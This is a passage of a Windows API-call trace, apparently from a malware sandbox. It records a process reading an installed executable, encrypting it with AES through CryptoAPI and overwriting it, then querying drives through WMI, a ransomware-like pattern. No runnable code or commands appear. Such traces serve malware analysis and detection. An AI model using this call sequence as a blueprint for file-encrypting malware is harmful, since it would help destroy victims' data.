[0202.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee88) returned 1 [0202.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6bce9a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0202.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee54) returned 1 [0202.071] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), fInfoLevelId=0x0, lpFileInformation=0x341b778 | out: lpFileInformation=0x341b778*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0)) returned 1 [0202.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee50) returned 1 [0202.098] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6bce894, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0202.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced88) returned 1 [0202.098] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0202.098] GetFileType (hFile=0x3dc) returned 0x1 [0202.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced84) returned 1 [0202.099] GetFileType (hFile=0x3dc) returned 0x1 [0202.099] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x6bcee90 | out: lpFileSizeHigh=0x6bcee90*=0x0) returned 0x99ba0 [0202.100] ReadFile (in: hFile=0x3dc, lpBuffer=0x2ee48198, nNumberOfBytesToRead=0x99ba0, lpNumberOfBytesRead=0x6bcee3c, lpOverlapped=0x0 | out: lpBuffer=0x2ee48198*, lpNumberOfBytesRead=0x6bcee3c*=0x99ba0, lpOverlapped=0x0) returned 1 [0202.177] CloseHandle (hObject=0x3dc) returned 1 [0202.177] CryptAcquireContextW (in: phProv=0x6bceddc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bceddc*=0x7a8650) returned 1 [0202.178] CryptGenRandom (in: hProv=0x7a8650, dwLen=0x10, pbBuffer=0x3539d9c | out: pbBuffer=0x3539d9c) returned 1 [0203.119] CryptImportKey (in: hProv=0x7a8650, pbData=0x35b0d58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcedac | out: phKey=0x6bcedac*=0x77ad30) returned 1 [0203.119] CryptContextAddRef (hProv=0x7a8650, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.119] CryptContextAddRef (hProv=0x7a8650, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.119] CryptDuplicateKey (in: hKey=0x77ad30, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bced9c | out: phKey=0x6bced9c*=0x77b5b0) returned 1 [0203.119] CryptContextAddRef (hProv=0x7a8650, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.119] CryptSetKeyParam (hKey=0x77b5b0, dwParam=0x4, pbData=0x35b0e38*=0x1, dwFlags=0x0) returned 1 [0203.119] CryptSetKeyParam (hKey=0x77b5b0, dwParam=0x1, pbData=0x35b0e04, dwFlags=0x0) returned 1 [0203.349] CryptEncrypt (in: hKey=0x77b5b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f192088*, pdwDataLen=0x6bcee08*=0x99bb0, dwBufLen=0x99bb0 | out: pbData=0x2f192088*, pdwDataLen=0x6bcee08*=0x99bb0) returned 1 [0203.354] CryptEncrypt (in: hKey=0x77b5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35b0e60*, pdwDataLen=0x6bcee10*=0x0, dwBufLen=0x10 | out: pbData=0x35b0e60*, pdwDataLen=0x6bcee10*=0x10) returned 1 [0203.385] CryptDestroyKey (hKey=0x77ad30) returned 1 [0203.385] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0203.386] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0203.386] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6bce880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0203.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bced74) returned 1 [0203.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0203.490] GetFileType (hFile=0x348) returned 0x1 [0203.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bced70) returned 1 [0203.490] GetFileType (hFile=0x348) returned 0x1 [0203.490] WriteFile (in: hFile=0x348, lpBuffer=0x30764058*, nNumberOfBytesToWrite=0x99dc0, lpNumberOfBytesWritten=0x6bcee30, lpOverlapped=0x0 | out: lpBuffer=0x30764058*, lpNumberOfBytesWritten=0x6bcee30*=0x99dc0, lpOverlapped=0x0) returned 1 [0203.505] CloseHandle (hObject=0x348) returned 1 [0203.644] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0203.644] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0203.644] CoTaskMemFree (pv=0x9831858) [0203.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.644] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedb0 | out: ppv=0x6bcedb0*=0x72015c) returned 0x0 [0203.644] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bceda8 | out: pAptType=0x6bceda8*=1) returned 0x0 [0203.644] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedac | out: ppvObject=0x6bcedac*=0x0) returned 0x80004002 [0203.644] IUnknown:Release (This=0x72015c) returned 0x1 [0203.647] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce718 | out: ppv=0x6bce718*=0x6736ef8) returned 0x0 [0203.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ef8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce930 | out: ppvObject=0x6bce930*=0x0) returned 0x80004002 [0203.648] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ef8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce944 | out: ppvObject=0x6bce944*=0x67388c0) returned 0x0 [0203.648] WbemDefPath:IUnknown:Release (This=0x6736ef8) returned 0x0 [0203.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce564 | out: ppvObject=0x6bce564*=0x67388c0) returned 0x0 [0203.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce520 | out: ppvObject=0x6bce520*=0x0) returned 0x80004002 [0203.648] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0203.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde7c | out: ppvObject=0x6bcde7c*=0x0) returned 0x80004002 [0203.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde2c | out: ppvObject=0x6bcde2c*=0x0) returned 0x80004002 [0203.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde38 | out: ppvObject=0x6bcde38*=0x77bec8) returned 0x0 [0203.648] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bec8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde40 | out: pCid=0x6bcde40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.648] WbemDefPath:IUnknown:Release (This=0x77bec8) returned 0x3 [0203.648] CoGetContextToken (in: pToken=0x6bcde98 | out: pToken=0x6bcde98) returned 0x0 [0203.649] CoGetContextToken (in: pToken=0x6bce2a0 | out: pToken=0x6bce2a0) returned 0x0 [0203.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce330 | out: ppvObject=0x6bce330*=0x0) returned 0x80004002 [0203.649] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0203.649] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0203.649] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0203.649] CoGetContextToken (in: pToken=0x6bceb88 | out: pToken=0x6bceb88) returned 0x0 [0203.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x6bcec58*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec54 | out: ppvObject=0x6bcec54*=0x67388c0) returned 0x0 [0203.649] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0203.649] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x2 [0203.649] WbemDefPath:IWbemPath:SetText (This=0x67388c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6bcedd8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd8*=0x20, pszText=0x0) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x6bcedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6bceddc | out: puCount=0x6bceddc*=0x0) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetInfo (in: This=0x67388c0, uRequestedInfo=0x0, puResponse=0x6bcede4 | out: puResponse=0x6bcede4*=0xc19) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x6bced5c | out: puCount=0x6bced5c*=0x0) returned 0x0 [0203.649] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bced48 | out: puCount=0x6bced48*=0x2) returned 0x0 [0203.650] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0x0, pszText=0x0 | out: puBuffLength=0x6bced44*=0xf, pszText=0x0) returned 0x0 [0203.650] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bced44*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.650] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcecf8 | out: ppv=0x6bcecf8*=0x72015c) returned 0x0 [0203.650] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcecf0 | out: pAptType=0x6bcecf0*=1) returned 0x0 [0203.650] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x0) returned 0x80004002 [0203.650] IUnknown:Release (This=0x72015c) returned 0x1 [0203.651] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce660 | out: ppv=0x6bce660*=0x6736db8) returned 0x0 [0203.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce878 | out: ppvObject=0x6bce878*=0x0) returned 0x80004002 [0203.651] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736db8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce88c | out: ppvObject=0x6bce88c*=0x6738700) returned 0x0 [0203.651] WbemDefPath:IUnknown:Release (This=0x6736db8) returned 0x0 [0203.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4ac | out: ppvObject=0x6bce4ac*=0x6738700) returned 0x0 [0203.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce468 | out: ppvObject=0x6bce468*=0x0) returned 0x80004002 [0203.651] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0203.651] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcddc4 | out: ppvObject=0x6bcddc4*=0x0) returned 0x80004002 [0203.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdd74 | out: ppvObject=0x6bcdd74*=0x0) returned 0x80004002 [0203.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdd80 | out: ppvObject=0x6bcdd80*=0x77bf88) returned 0x0 [0203.652] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bf88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdd88 | out: pCid=0x6bcdd88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.652] WbemDefPath:IUnknown:Release (This=0x77bf88) returned 0x3 [0203.652] CoGetContextToken (in: pToken=0x6bcdde0 | out: pToken=0x6bcdde0) returned 0x0 [0203.652] CoGetContextToken (in: pToken=0x6bce1e8 | out: pToken=0x6bce1e8) returned 0x0 [0203.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce278 | out: ppvObject=0x6bce278*=0x0) returned 0x80004002 [0203.652] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0203.652] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0203.652] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0203.652] CoGetContextToken (in: pToken=0x6bcead0 | out: pToken=0x6bcead0) returned 0x0 [0203.652] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x6bceba0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bceb9c | out: ppvObject=0x6bceb9c*=0x6738700) returned 0x0 [0203.652] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0203.652] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0203.652] WbemDefPath:IWbemPath:SetText (This=0x6738700, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0203.652] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x6bced20 | out: puCount=0x6bced20*=0x2) returned 0x0 [0203.652] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6bced1c*=0x0, pszText=0x0 | out: puBuffLength=0x6bced1c*=0xf, pszText=0x0) returned 0x0 [0203.652] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x6bced1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.653] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced20 | out: ppv=0x6bced20*=0x72015c) returned 0x0 [0203.653] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced18 | out: pAptType=0x6bced18*=1) returned 0x0 [0203.653] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced1c | out: ppvObject=0x6bced1c*=0x0) returned 0x80004002 [0203.653] IUnknown:Release (This=0x72015c) returned 0x1 [0203.654] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce940 | out: ppv=0x6bce940*=0x672f1d8) returned 0x0 [0203.654] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bceb58 | out: ppvObject=0x6bceb58*=0x0) returned 0x80004002 [0203.654] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb6c | out: ppvObject=0x6bceb6c*=0x67370f8) returned 0x0 [0203.654] WbemLocator:IUnknown:Release (This=0x672f1d8) returned 0x0 [0203.654] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce78c | out: ppvObject=0x6bce78c*=0x67370f8) returned 0x0 [0203.654] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce748 | out: ppvObject=0x6bce748*=0x0) returned 0x80004002 [0203.654] WbemLocator:IUnknown:AddRef (This=0x67370f8) returned 0x3 [0203.654] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0a4 | out: ppvObject=0x6bce0a4*=0x0) returned 0x80004002 [0203.654] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce054 | out: ppvObject=0x6bce054*=0x0) returned 0x80004002 [0203.654] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce060 | out: ppvObject=0x6bce060*=0x0) returned 0x80004002 [0203.670] CoGetContextToken (in: pToken=0x6bce0c0 | out: pToken=0x6bce0c0) returned 0x0 [0203.670] CoGetContextToken (in: pToken=0x6bce4c8 | out: pToken=0x6bce4c8) returned 0x0 [0203.670] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce558 | out: ppvObject=0x6bce558*=0x0) returned 0x80004002 [0203.670] WbemLocator:IUnknown:Release (This=0x67370f8) returned 0x2 [0203.670] WbemLocator:IUnknown:Release (This=0x67370f8) returned 0x1 [0203.670] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0203.670] CoGetContextToken (in: pToken=0x6bcea98 | out: pToken=0x6bcea98) returned 0x0 [0203.670] WbemLocator:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x6bceb68*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bceb64 | out: ppvObject=0x6bceb64*=0x67370f8) returned 0x0 [0203.671] WbemLocator:IUnknown:AddRef (This=0x67370f8) returned 0x3 [0203.671] WbemLocator:IUnknown:Release (This=0x67370f8) returned 0x2 [0203.671] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x6bcecfc | out: puCount=0x6bcecfc*=0x2) returned 0x0 [0203.671] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x6bcecf8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcecf8*=0xf, pszText=0x0) returned 0x0 [0203.671] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x6bcecf8*=0xf, pszText="00000000000000" | out: 